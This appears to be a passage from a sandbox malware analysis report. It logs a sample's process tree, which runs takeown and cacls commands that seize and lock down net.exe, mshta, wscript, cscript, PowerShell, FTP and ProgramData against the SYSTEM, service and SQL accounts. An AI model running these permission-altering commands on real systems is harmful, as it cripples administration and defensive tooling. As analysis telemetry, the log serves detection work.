C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵
-
